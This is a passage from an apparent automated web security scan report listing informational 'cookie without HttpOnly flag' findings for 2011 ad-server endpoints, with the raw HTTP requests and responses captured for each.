HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:48:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:16 GMT; path=/
Set-Cookie: i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L; expires=Fri, 04-Mar-2011 21:48:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 821

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=1377911769&PG=INVSRQ&ASID=2af8a7eb720e4efda85b7da3
...[SNIP]...

12.217. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:57 GMT; path=/
i_1=33:353:198:3:0:38655:1296683337:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:48:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:48:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:57 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38655:1296683337:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:48:57 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 824

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a4
...[SNIP]...

12.218. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d1e80eb13df2; expires=Fri, 04-Mar-2011 15:22:49 GMT; path=/
i_1=33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2|33:1359:827:0:0:34115:1296343593:B2; expires=Thu, 03-Mar-2011 15:22:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4d1e80eb13df2; i_1=33:971:560:0:0:34147:1296491944:B2|33:1359:827:0:0:34115:1296343593:B2|33:1359:827:0:0:37452:1295382870:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 01 Feb 2011 15:22:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d1e80eb13df2; expires=Fri, 04-Mar-2011 15:22:49 GMT; path=/
Set-Cookie: i_1=33:971:560:0:0:34240:1296573769:B2|33:971:560:0:0:34147:1296491944:B2|33:1359:827:0:0:34115:1296343593:B2; expires=Thu, 03-Mar-2011 15:22:49 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

12.219. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!=!(4vA!!!!#<kc#t!(mhO!!!!#<lEK*!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; path=/; expires=Fri, 01-Feb-2013 15:13:48 GMT
vuday1=_UO8O5_x-d!>[UWGM:%]; path=/; expires=Thu, 03-Feb-2011 00:00:00 GMT
lifb=ty?i)oaEEn%y_Qs7i<Qa>BiQOJap]T6KK(#; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/computers;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; lifb=%y_Qs7i<Qa>BiQOJap]Thmj[); bh="b!!!#p!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; ih="b!!!!<!(4vA!!!!#<kc#t!(mhO!!!!#<lEK*!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; vuday1=_UO8O5_x-c!>[UWhS6Z+

Response

12.220. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ih="b!!!!:!(4vA!!!!#<kc#t!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!0>0V!!!!#<l/M."; path=/; expires=Fri, 01-Feb-2013 15:11:28 GMT
bh="b!!!#p!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!'<l/M+!#MTF!!!!'<l/M+!#MTH!!!!'<l/M+!#MTI!!!!'<l/M+!#MTJ!!!!'<l/M+!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!#<l/M+!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!'<l/M+!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; path=/; expires=Fri, 01-Feb-2013 15:11:28 GMT
vuday1=5_x-c!>[UWVQm*h; path=/; expires=Thu, 03-Feb-2011 00:00:00 GMT
pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; path=/; expires=Fri, 01-Feb-2013 15:11:28 GMT
lifb=%y_Qs7i<Qa>BiQOJap]Thmj[); path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?Z=300x250&click=http%3a%2f%2fad.doubleclick.net%2fclick%3Bh%3Dv8%2f3aa2%2f3%2f0%2f%2a%2fn%3B228957569%3B0%2d0%3B0%3B45421688%3B4307%2d300%2f250%3B38375088%2f38392845%2f1%3B%3B%7Eaopt%3D2%2f0%2f36%2f0%3B%7Esscs%3D%3f&e=58661&S=&I=homepage&_salt=863799931&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/c